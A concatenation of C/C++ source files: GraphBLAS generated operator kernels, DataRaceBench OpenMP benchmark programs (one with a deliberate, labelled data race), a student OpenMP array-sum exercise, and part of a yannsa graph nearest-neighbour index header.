const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
GxB_FC64_t alpha_scalar ;
GxB_FC64_t beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((GxB_FC64_t *) alpha_scalar_in)) ;
beta_scalar = (*((GxB_FC64_t *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__second_fc64)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
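//------------------------------------------------------------------------------
// note (illustrative, not generated code): what GB_FLIPPED selects
//------------------------------------------------------------------------------
// For a hypothetical non-commutative operator fmult with no flipped variant,
// the two instantiations of GB_emult_02_template.c above differ only in
// operand order:
//      GB_FLIPPED == 1:   z = fmult (y, x)    // use fmult(y,x)
//      GB_FLIPPED == 0:   z = fmult (x, y)    // use fmult(x,y)
// For SECOND (z = y), no flip is ever required: the flipped form is simply
// FIRST (z = x).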
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__second_fc64)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__second_fc64)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t *Cx = (GxB_FC64_t *) Cx_output ;
GxB_FC64_t x = (*((GxB_FC64_t *) x_input)) ;
GxB_FC64_t *Bx = (GxB_FC64_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
GxB_FC64_t bij = GBX (Bx, p, false) ;
Cx [p] = bij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
GxB_FC64_t *Cx = (GxB_FC64_t *) Cx_output ;
GxB_FC64_t *Ax = (GxB_FC64_t *) Ax_input ;
GxB_FC64_t y = (*((GxB_FC64_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
; ;
Cx [p] = y ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
GxB_FC64_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC64_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t x = (*((const GxB_FC64_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC64_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = y ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t y = (*((const GxB_FC64_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
DRB096-doall2-taskloop-collapse-orig-no.c | /*
Copyright (C) 1991-2018 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>.
*/
/*
This header is separate from features.h so that the compiler can
include it implicitly at the start of every compilation. It must
not itself include <features.h> or any other header that includes
<features.h> because the implicit include comes before any feature
test macros that may be defined in a source file before it first
explicitly includes a system header. GCC knows the name of this
header in order to preinclude it.
*/
/*
glibc's intent is to support the IEC 559 math functionality, real
and complex. If the GCC (4.9 and later) predefined macros
specifying compiler intent are available, use them to determine
whether the overall intent is to support these features; otherwise,
presume an older compiler has intent to support these features and
define these macros by default.
*/
/*
wchar_t uses Unicode 10.0.0. Version 10.0 of the Unicode Standard is
synchronized with ISO/IEC 10646:2017, fifth edition, plus
the following additions from Amendment 1 to the fifth edition:
- 56 emoji characters
- 285 hentaigana
- 3 additional Zanabazar Square characters
*/
/*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
Two-dimensional array computation:
In the original benchmark, both loops are associated with a single
omp taskloop via collapse(2), and both loop index variables are private;
taskloop requires an OpenMP 4.5 compiler. The code below is the
Cetus-transformed variant, which uses nested omp parallel for loops
instead; a sketch of the taskloop form follows this comment.
*/
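/*
  A minimal sketch (assumed, not part of this benchmark) of the taskloop
  form described above; kept disabled since the transformed code below
  uses nested parallel-for loops instead.
*/
#if 0
void taskloop_variant(int b[100][100])
{
  #pragma omp parallel
  #pragma omp single
  #pragma omp taskloop collapse(2)
  for (int i = 0; i < 100; i++)
    for (int j = 0; j < 100; j++)
      b[i][j] += 1;
  /* i and j are private per OpenMP rules for collapsed loop iterators */
}
#endif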
#include <stdio.h>
int a[100][100];
int main()
{
int i, j;
int _ret_val_0;
#pragma cetus private(i, j)
#pragma loop name main#0
#pragma cetus parallel
#pragma omp parallel for private(i, j)
for (i=0; i<100; i ++ )
{
#pragma cetus private(j)
#pragma loop name main#0#0
#pragma cetus parallel
#pragma omp parallel for private(j)
for (j=0; j<100; j ++ )
{
a[i][j]+=1;
}
}
printf("a[50][50]=%d\n", a[50][50]);
_ret_val_0=0;
return _ret_val_0;
}
|
GB_unop__log1p_fc32_fc32.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop_apply__log1p_fc32_fc32
// op(A') function: GB_unop_tran__log1p_fc32_fc32
// C type: GxB_FC32_t
// A type: GxB_FC32_t
// cast: GxB_FC32_t cij = aij
// unaryop: cij = GB_clog1pf (aij)
#define GB_ATYPE \
GxB_FC32_t
#define GB_CTYPE \
GxB_FC32_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
GxB_FC32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = GB_clog1pf (x) ;
// casting
#define GB_CAST(z, aij) \
GxB_FC32_t z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GxB_FC32_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
GxB_FC32_t z = aij ; \
Cx [pC] = GB_clog1pf (z) ; \
}
// true if operator is the identity op with no typecasting
#define GB_OP_IS_IDENTITY_WITH_NO_TYPECAST \
0
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_LOG1P || GxB_NO_FC32)
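// note: per the unaryop definition above, each entry is computed as
// cij = GB_clog1pf (aij), the complex single-precision log1p, z = log (1+x).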
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_apply__log1p_fc32_fc32
(
GxB_FC32_t *Cx, // Cx and Ax may be aliased
const GxB_FC32_t *Ax,
const int8_t *GB_RESTRICT Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
if (Ab == NULL)
{
#if ( GB_OP_IS_IDENTITY_WITH_NO_TYPECAST )
GB_memcpy (Cx, Ax, anz * sizeof (GxB_FC32_t), nthreads) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
GxB_FC32_t aij = Ax [p] ;
GxB_FC32_t z = aij ;
Cx [p] = GB_clog1pf (z) ;
}
#endif
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
GxB_FC32_t aij = Ax [p] ;
GxB_FC32_t z = aij ;
Cx [p] = GB_clog1pf (z) ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_tran__log1p_fc32_fc32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
DRB005-indirectaccess1-orig-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
This program is extracted from a real application at LLNL.
Two pointers (xa1 and xa2) have a pair of values with a distance of 12.
They are used as start base addresses for two 1-D arrays.
Their index set has two indices with a distance of 12: 911 + 12 = 923
(see the inline comment in indexSet below).
So there is loop carried dependence.
However, having loop carried dependence does not mean data races will always happen.
The iterations with loop carried dependence must be scheduled to
different threads in order for data races to happen.
In this example, we use schedule(static,1) to increase the chance that
the dependent loop iterations will be scheduled to different threads.
Data race pair: xa1[idx]@128:5 vs. xa2[idx]@129:5
*/
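/*
  A note on the scheduling choice (a sketch of the reasoning, not original
  benchmark text): with schedule(static,1) and T threads, iteration i is
  assigned round-robin to thread i % T, so two iterations whose index-set
  entries alias are almost always executed by different threads, which is
  what turns a loop-carried dependence into an observable race.
*/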
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#define N 180
int indexSet[N] = {
521, 523, 525, 527, 529, 531,
547, 549, 551, 553, 555, 557,
573, 575, 577, 579, 581, 583,
599, 601, 603, 605, 607, 609,
625, 627, 629, 631, 633, 635,
651, 653, 655, 657, 659, 661,
859, 861, 863, 865, 867, 869,
885, 887, 889, 891, 893, 895,
911, 913, 915, 917, 919, 923, // change original 921 to 923 = 911+12
937, 939, 941, 943, 945, 947,
963, 965, 967, 969, 971, 973,
989, 991, 993, 995, 997, 999,
1197, 1199, 1201, 1203, 1205, 1207,
1223, 1225, 1227, 1229, 1231, 1233,
1249, 1251, 1253, 1255, 1257, 1259,
1275, 1277, 1279, 1281, 1283, 1285,
1301, 1303, 1305, 1307, 1309, 1311,
1327, 1329, 1331, 1333, 1335, 1337,
1535, 1537, 1539, 1541, 1543, 1545,
1561, 1563, 1565, 1567, 1569, 1571,
1587, 1589, 1591, 1593, 1595, 1597,
1613, 1615, 1617, 1619, 1621, 1623,
1639, 1641, 1643, 1645, 1647, 1649,
1665, 1667, 1669, 1671, 1673, 1675,
1873, 1875, 1877, 1879, 1881, 1883,
1899, 1901, 1903, 1905, 1907, 1909,
1925, 1927, 1929, 1931, 1933, 1935,
1951, 1953, 1955, 1957, 1959, 1961,
1977, 1979, 1981, 1983, 1985, 1987,
2003, 2005, 2007, 2009, 2011, 2013};
int main (int argc, char* argv[])
{
// The max index value is 2013. Allocate 2*(2013+1) doubles so that
// xa2 = base + 2014 can be indexed up to xa2[2013] = base[4027].
// xa1 and xa2 never access the same element, since xa2 = base + 2014
// starts past xa1's highest reachable offset.
double * base = (double*) malloc(sizeof(double)* (2013+1+2013+1));
if (base == 0)
{
printf ("Error in malloc(). Aborting ...\n");
return 1;
}
double * xa1 = base;
double * xa2 = xa1 + 2014;
int i;
// initialize every element reachable through xa1[idx] or xa2[idx],
// i.e. base[521] .. base[2014+2013]
#pragma omp parallel for private(i)
for (i = 521; i <= 2014 + 2013; ++i)
{
base[i]=0.5*i;
}
// default static even scheduling may not trigger the data race; use
// schedule(static,1) instead so dependent iterations land on different threads.
#pragma omp parallel for private(i) schedule(static,1)
for (i =0; i< N; ++i)
{
int idx = indexSet[i];
xa1[idx]+= 1.0 + i;
xa2[idx]+= 3.0 + i;
}
printf("x1[999]=%f xa2[1285]=%f\n", xa1[999], xa2[1285]);
free (base);
return 0;
}
|
cleaned_t_b_all.c | /**
F.H.P.C. Assignment 2
@file cleaned_t_b_all_option_2.cc
@brief All threads fill the array and perform the sum.
@author Pietro Morichetti
@date 17/12/2019
@version 1.1
*/
#define _GNU_SOURCE // feature-test macro: must be defined before any #include
#include <stdlib.h>
#include <stdio.h>
#include <omp.h>
#define N 10000000 // size of the problem
int main(int argc, char **argv){
long int S = 0;
int* array = (int*)malloc(N * sizeof(int));
if (array == NULL) { // guard against allocation failure
printf("malloc of %d ints failed\n", N);
return 1;
}
#if defined(_OPENMP)
if(argc > 1){
omp_set_num_threads(atoi(*(argv + 1))); // set the number of threads
}
#endif
#pragma omp parallel for // everybody fills the array
for(int ii = 0; ii < N; ++ii){
array[ii] = ii;
}
#pragma omp parallel for reduction(+:S) // each thread sums its share, then reduce into S
for(int ii = 0; ii < N; ++ii){
S += array[ii];
}
printf("S = %ld (expected %ld)\n", S, ((long int)N) * (N - 1) / 2); // sum 0..N-1 = N(N-1)/2
free(array);
return 0;
}
|
graph_index.h | #ifndef YANNSA_GRAPH_INDEX_H
#define YANNSA_GRAPH_INDEX_H
#include "yannsa/base/type_definition.h"
#include "yannsa/base/error_definition.h"
#include "yannsa/base/constant_definition.h"
#include "yannsa/util/sorted_array.h"
#include "yannsa/util/parameter.h"
#include "yannsa/util/logging.h"
#include "yannsa/util/lock.h"
#include "yannsa/util/random_generator.h"
#include "yannsa/core/base_index.h"
#include <omp.h>
#include <vector>
#include <string>
#include <memory>
#include <algorithm>
#include <fstream>
#include <sstream>
#include <cstdlib>
namespace yannsa {
namespace core {
template <typename PointType, typename DistanceFuncType, typename DistanceType = float>
class GraphIndex : public BaseIndex<PointType, DistanceFuncType, DistanceType> {
public:
typedef BaseIndex<PointType, DistanceFuncType, DistanceType> BaseClass;
typedef typename BaseClass::Dataset Dataset;
typedef typename BaseClass::DatasetPtr DatasetPtr;
typedef typename BaseClass::PointVector PointVector;
private:
// point
typedef PointDistancePair<IntIndex, DistanceType> PointDistancePairItem;
typedef util::SortedArray<PointDistancePairItem> PointNeighbor;
private:
struct PointInfo {
// graph
PointNeighbor knn;
// for local join
IdList old_list;
IdList new_list;
IdList reverse_old_list;
IdList reverse_new_list;
DistanceType radius;
size_t effect_size;
util::Mutex lock;
PointInfo(int k) {
knn = PointNeighbor(k);
}
void reset(size_t s) {
old_list.clear();
new_list.clear();
reverse_new_list.clear();
reverse_old_list.clear();
effect_size = s;
if (effect_size > 0) {
radius = knn[effect_size-1].distance;
}
else {
radius = 0;
}
}
void insert(IntIndex point_id, bool new_flag) {
if (new_flag) {
new_list.push_back(point_id);
}
else {
old_list.push_back(point_id);
}
}
void parallel_insert_reverse(IntIndex point_id, bool new_flag) {
util::ScopedLock sl(lock);
if (new_flag) {
reverse_new_list.push_back(point_id);
}
else {
reverse_old_list.push_back(point_id);
}
}
};
public:
GraphIndex(typename BaseClass::DatasetPtr& dataset_ptr) : BaseClass(dataset_ptr) {}
void Build(const util::GraphIndexParameter& index_param);
void AddNewPoint(const std::string& key, const PointType& point_vec, int search_K);
void SearchKnn(const PointType& query, const util::GraphSearchParameter& search_param,
std::vector<std::string>& search_result);
void SaveIndex(const std::string file_path);
void LoadIndex(const std::string file_path);
private:
void SearchKnn(const PointType& query, int search_K, PointNeighbor& knn_results);
void MMRRanking(const PointType& vertex_vec, PointNeighbor& knn, size_t knn_candidate_size, double lambda);
void Init(const util::GraphIndexParameter& index_param);
void Clear();
void BuildKnnGraphIndex(int refine_iter_num);
void ExtractIndex();
void Prune();
void Reverse();
inline const PointType& GetPoint(IntIndex point_id) {
return (*this->dataset_ptr_)[point_id];
}
inline IntIndex PointSize() {
return this->dataset_ptr_->size();
}
int UpdatePointKnn(IntIndex point1, IntIndex point2);
void InitPointNeighborInfo();
void UpdatePointNeighborInfo();
int LocalJoin();
private:
// index
int k_;
int join_k_;
double lambda_;
std::vector<PointInfo> all_point_info_;
// search
IdList shuffle_point_id_list_;
std::vector<IdList> all_point_index_;
DistanceFuncType distance_func_;
};
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Clear() {
this->have_built_ = false;
// point
all_point_info_.clear();
all_point_index_.clear();
shuffle_point_id_list_.clear();
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Init(
const util::GraphIndexParameter& index_param) {
k_ = index_param.k;
join_k_ = std::max(index_param.join_k, k_);
lambda_ = index_param.lambda;
IntIndex max_point_id = this->dataset_ptr_->size();
all_point_index_.reserve(max_point_id);
all_point_info_ = std::vector<PointInfo>(max_point_id, PointInfo(join_k_));
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::LoadIndex(
const std::string file_path) {
util::Log("load the index from " + file_path);
Clear();
IntIndex total_cnt = 0;
IntIndex max_cnt = 0;
std::ifstream load_file(file_path, std::ios::binary);
// magic number
int magic_number = 0;
load_file.read(reinterpret_cast<char*>(&magic_number), sizeof(int));
if (magic_number != constant::magic_number) {
throw IndexReadError("index is corrupted!");
}
// meta information
// all point number
IntIndex point_number = 0;
load_file.read(reinterpret_cast<char*>(&point_number), sizeof(IntIndex));
// parameters for updating
load_file.read(reinterpret_cast<char*>(&k_), sizeof(int));
load_file.read(reinterpret_cast<char*>(&join_k_), sizeof(int));
load_file.read(reinterpret_cast<char*>(&lambda_), sizeof(double));
all_point_index_.reserve(point_number);
all_point_index_.resize(point_number);
IntIndex neighbor_num = 0;
for (IntIndex point_id = 0; point_id < point_number; point_id++) {
load_file.read(reinterpret_cast<char*>(&neighbor_num), sizeof(IntIndex));
max_cnt = std::max(max_cnt, neighbor_num);
total_cnt += neighbor_num;
IdList& knn_list = all_point_index_[point_id];
knn_list.resize(neighbor_num);
for (size_t i = 0; i < neighbor_num; i++) {
load_file.read(reinterpret_cast<char*>(&knn_list[i]), sizeof(IntIndex));
}
}
util::Log("Point: " + std::to_string(all_point_index_.size()) +
" Max nn = " + std::to_string(max_cnt) +
" Average nn = " + std::to_string(total_cnt * 1.0 / PointSize()) +
" k = " + std::to_string(k_) + " join_k = " + std::to_string(join_k_));
// shuffle data
for (IntIndex i = 0; i < PointSize(); i++) {
shuffle_point_id_list_.push_back(i);
}
std::random_shuffle(shuffle_point_id_list_.begin(), shuffle_point_id_list_.end());
this->SetIndexBuiltFlag();
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SaveIndex(
const std::string file_path) {
this->CheckIndexIsBuilt();
util::Log("save the index to " + file_path);
std::ofstream save_file(file_path, std::ios::binary);
// magic number
int magic_number = constant::magic_number;
save_file.write(reinterpret_cast<char*>(&magic_number), sizeof(int));
// meta information
// all point number
IntIndex point_number = PointSize();
save_file.write(reinterpret_cast<char*>(&point_number), sizeof(IntIndex));
// parameters for updating
save_file.write(reinterpret_cast<char*>(&k_), sizeof(int));
save_file.write(reinterpret_cast<char*>(&join_k_), sizeof(int));
save_file.write(reinterpret_cast<char*>(&lambda_), sizeof(double));
// neighbor_num neighbor1 neighbor2
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
const IdList& knn_list = all_point_index_[point_id];
IntIndex neighbor_num = knn_list.size();
save_file.write(reinterpret_cast<char*>(&neighbor_num), sizeof(IntIndex));
for (IntIndex neighbor_id : knn_list) {
save_file.write(reinterpret_cast<char*>(&neighbor_id), sizeof(IntIndex));
}
}
save_file.close();
}
/*
TODO: reserve the neighbor containers and the point index up front
to reduce memory cost.
*/
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::AddNewPoint(
const std::string& key, const PointType& point_vec, int search_K) {
this->CheckIndexIsBuilt();
// find join_k_ neighbors
PointNeighbor new_point_knn(std::max(search_K, join_k_));
SearchKnn(point_vec, search_K, new_point_knn);
// rank neighbors of new point and keep top-k
MMRRanking(point_vec, new_point_knn, join_k_, lambda_);
// insert data point into dataset
// insert must after search
IntIndex new_point_id = this->dataset_ptr_->insert(key, point_vec);
// insert new point's knn list
// clamp to the number of neighbors actually found in the search
int new_neighbor_num = std::min(static_cast<int>(new_point_knn.size()), std::max(join_k_, k_*2));
IdList new_point_knn_list(new_neighbor_num);
for (int i = 0; i < new_neighbor_num; i++) {
new_point_knn_list[i] = new_point_knn[i].id;
all_point_index_[new_point_knn[i].id].push_back(new_point_id);
}
all_point_index_.push_back(new_point_knn_list);
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Build(
const util::GraphIndexParameter& index_param) {
this->CheckIndexIsNotBuilt();
Clear();
Init(index_param);
util::Log("compute initial neighbor candidates");
BuildKnnGraphIndex(index_param.refine_iter_num);
util::Log("re-rank neighbor candidates");
Prune();
util::Log("reverse k-diverse nearest neighbors");
Reverse();
ExtractIndex();
this->SetIndexBuiltFlag();
util::Log("complete the building of k-DNN graph");
}
